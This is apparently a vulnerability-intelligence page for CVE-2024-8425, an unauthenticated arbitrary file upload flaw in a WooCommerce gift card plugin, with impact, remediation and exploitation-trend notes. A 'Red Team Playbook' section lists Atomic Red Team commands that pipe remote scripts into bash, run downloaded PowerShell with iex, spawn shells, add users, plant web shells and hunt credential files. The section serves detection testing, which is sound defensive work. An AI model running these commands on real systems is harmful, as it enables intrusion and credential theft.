CVE-2024-8425
Overview
This vulnerability is an arbitrary file upload flaw caused by insufficient validation of file types in the WooCommerce Ultimate Gift Card WordPress plugin. The root cause lies in the 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data' functions, which fail to properly restrict or sanitize uploaded file formats. This improper input validation allows unauthorized files to be uploaded to the server through these plugin components.
Vulnerability Description
The WooCommerce Ultimate Gift Card plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data' functions in all versions up to, and including, 2.9.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Please note that this may have been patched on an older version than 2.9.2, however, we do not have access to older versions of the software to confirm when the patch was added. The only patched version we have confirmed is 2.9.3.
Impact
An unauthenticated attacker can exploit this vulnerability to upload arbitrary files to the target server, potentially leading to remote code execution and full system compromise. No authentication or user interaction is required (AV:N/AC:L/PR:N/UI:N), allowing remote exploitation over the network. This can result in unauthorized access to sensitive data, persistent backdoors, or disruption of service, severely impacting the confidentiality, integrity, and availability of the affected WordPress site.
Solution
To remediate this vulnerability, upgrade the WooCommerce Ultimate Gift Card plugin to version 2.9.3 or later, as confirmed by the Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/6ebffb82-7455-40c9-9ffd-b78e0e73e431). This version includes proper file type validation in the affected functions. No alternative workarounds are documented; therefore, applying the vendor's patch is the primary mitigation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the WooCommerce Ultimate Gift Card plugin for WordPress arises from inadequate validation of file types during specific function executions, namely 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data'. This flaw allows unauthenticated users to upload arbitrary files to the server hosting the affected WordPress site. The lack of stringent checks on the file types means that attackers can exploit this weakness to upload malicious scripts or executables, which may lead to remote code execution. Such a scenario poses a significant risk, as it enables attackers to gain unauthorized access to the server, potentially compromising sensitive data or taking control of the entire web application.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a request that includes a malicious file disguised as a legitimate image or document. By leveraging the functions that handle file uploads, they can bypass security measures that typically restrict file types. Once the malicious file is uploaded, the attacker can execute it to run arbitrary code on the server. This could lead to a range of malicious activities, including data theft, website defacement, or the installation of backdoors for persistent access. The ease of exploitation, combined with the high CVSS score of 9.8, indicates that the vulnerability is particularly critical and should be addressed immediately.
The real-world impact of this vulnerability can be severe for businesses relying on the WooCommerce Ultimate Gift Card plugin. If exploited, an attacker could gain access to sensitive customer information, including payment details and personal data, leading to potential financial losses and reputational damage. Furthermore, the presence of malicious code on a server can result in the website being blacklisted by search engines or security services, further harming the business's online presence. The financial implications of a data breach, coupled with the loss of customer trust, can be devastating, making it imperative for organizations to prioritize the remediation of such vulnerabilities.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, regular security audits and vulnerability assessments should be conducted to identify and address weaknesses in their web applications. Employing a web application firewall (WAF) can help filter out malicious requests and provide an additional layer of security against file upload attacks. Additionally, organizations should ensure that they are using the latest version of the WooCommerce Ultimate Gift Card plugin, as updates often include patches for known vulnerabilities. Educating developers on secure coding practices, particularly regarding file uploads and input validation, is also crucial in preventing similar vulnerabilities in the future.
In conclusion, the vulnerability in the WooCommerce Ultimate Gift Card plugin poses a significant threat to the security of WordPress sites utilizing this plugin. The potential for arbitrary file uploads and subsequent remote code execution can lead to severe consequences for businesses, including data breaches and reputational damage. By adopting proactive detection and mitigation strategies, organizations can safeguard their web applications and protect sensitive customer information from malicious actors. Addressing such vulnerabilities is not just a technical necessity but a critical component of maintaining trust and integrity in the digital marketplace.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the WooCommerce Ultimate Gift Card plugin vulnerability, indicating increased attacker interest and activity despite a declining EPSS score. This divergence suggests that while the overall probability of exploitation in the wild may be moderating, threat actors are intensifying targeted efforts, possibly leveraging emerging proof-of-concept exploits circulating on public repositories. For defenders, this signals a heightened need for vigilance as the risk of successful arbitrary file uploads and potential remote code execution remains acute, particularly given the unauthenticated nature of the exploit vector. The evolving exploitation landscape underscores that the threat level remains critical, with adversaries actively probing for vulnerable instances to compromise, thereby sustaining a high operational risk for affected WordPress environments.
Update 2 — June 07, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the WooCommerce Ultimate Gift Card plugin vulnerability, with telemetry indicating a doubling in detection frequency over a short period. This surge coincides with the wider dissemination of new proof-of-concept exploits on public code repositories, which likely lowers the barrier for adversaries to conduct arbitrary file upload attacks. Although the EPSS score has slightly decreased, reflecting a modest reduction in predicted exploit probability, the increased detection activity suggests that threat actors are intensifying reconnaissance and exploitation efforts. For defenders, this divergence between predictive scoring and observed activity underscores the persistent and evolving nature of the threat, emphasizing that the critical risk of remote code execution via unauthenticated vectors remains imminent. Consequently, the threat level should be considered sustained at a critical posture, with heightened vigilance warranted to detect and respond to exploitation attempts leveraging this vulnerability.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Wpswings | Woocommerce Ultimate Gift Card | All |
cpe:2.3:a:wpswings:woocommerce_ultimate_gift_card:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
KTN1990/CVE-2024-8425
The WooCommerce Ultimate Gift Card plugin for WordPress is vulnerable to arbitrary file uploads.
|
KTN1990 | 2 | 0 | 2025-04-19 | View |
Threat Feed
11 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-8425 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/6ebffb82-7455-40c9-9ffd-b78e0e73e431?source=cve |
| codecanyon.net |
GitHub CVE
|
https://codecanyon.net/item/woocommerce-ultimate-gift-card/19191057 |